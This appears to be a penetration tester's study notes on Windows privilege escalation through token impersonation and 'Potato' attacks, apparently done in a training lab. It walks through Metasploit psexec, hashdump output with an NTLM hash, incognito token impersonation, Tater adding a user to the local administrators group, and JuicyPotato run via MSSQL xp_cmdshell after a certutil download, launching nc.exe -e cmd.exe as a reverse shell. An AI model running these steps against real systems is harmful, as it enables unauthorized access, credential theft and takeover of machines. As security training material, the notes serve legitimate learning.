Token Impersonation - Potato attacks

What is it

  • Token are temp keys that give access to a system or network without credentials.

How to

  • Launch Metasploit msfconsole

  • Choose the exploit: use exploit/windows/smb/psexec

  • Set: rhosts, smbdomain, smbpass, smbuser, target (we can use show targets to have a list), payload

  • Launch the attack: run

  • We get a shell:

    msf6 exploit(windows/smb/psexec) > run
    [*] Started reverse TCP handler on 
    [*] - Connecting to the server...
    [*] - Authenticating to|marvel.local as user 'fcastle'...
    [!] - peer_native_os is only available with SMB1 (current version: SMB3)
    [*] - Uploading payload... oeyrkyrs.exe
    [*] - Created \oeyrkyrs.exe...
    [*] Sending stage (200262 bytes) to
    [+] - Service started successfully...
    [*] - Deleting \oeyrkyrs.exe...
    [*] Meterpreter session 1 opened ( -> ) at 2022-02-11 13:49:12 -0500
    meterpreter > 
  • Getting hashes: hashdump

    meterpreter > hashdump
    Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
  • Use tools: load (double tab to get the list of tools)

  • load incognito

    Incognito Commands
        Command              Description
        -------              -----------
        add_group_user       Attempt to add a user to a global group with all tokens
        add_localgroup_user  Attempt to add a user to a local group with all tokens
        add_user             Attempt to add a user with all tokens
        impersonate_token    Impersonate specified token
        list_tokens          List tokens available under current user context
        snarf_hashes         Snarf challenge/response hashes for every token
  • list_tokens -u

    meterpreter > list_tokens -u
    Delegation Tokens Available
    Font Driver Host\UMFD-0
    Font Driver Host\UMFD-1
    Font Driver Host\UMFD-2
    Window Manager\DWM-1
    Window Manager\DWM-2
    Impersonation Tokens Available
    No tokens available
  • Impersonate Administrator:

    meterpreter > impersonate_token marvel\\administrator
    [+] Delegation token available
    [+] Successfully impersonated user MARVEL\Administrator
    meterpreter > shell
    Process 8576 created.
    Channel 1 created.
    Microsoft Windows [Version 10.0.19044.1288]
    (c) Microsoft Corporation. All rights reserved.
  • If we hashdump again it will not work so we can rev2self to get back to the initial user

  • Any user that has logged in the target will have a token there until the target reboots

Potato Attacks

  • These attacks requires the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to be enabled on the machine.

Hot potato

  • We can use Tater

  • powershell.exe -nop -ep bypass

  • Import-Module .\Tater.ps1

  • Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

  • Your user should be in the administrators group net localgroup administrators to check

  • See here an example of a potato attack

Juicy potato

Enumeration after initial shell with MSSQL

  • Say we have a shell on an mssql instance sql_dev@IP-ADD -windows-auth

  • We can enable command shell using enable_xp_cmdshell

  • And then we will be able to type every command we need this way: xp_cmdshell whoami /priv

  • We do!


  • Let's get JuicyPotato binary in our attacking machine wget

  • Let's serve the file to our target using python http server python3 -m http.server 80

  • Let's take it in our shell using certutil xp_cmdshell certutil.exe -urlcache -f C:\Tools\JuicyPotato.exe

  • Let's get an admin shell xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 8443 -e cmd.exe" -t * where -l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the createprocess call. We are trying both the CreateProcessWithTokenW and CreateProcessAsUser functions, which need SeImpersonate or SeAssignPrimaryToken privileges respectively.


Last updated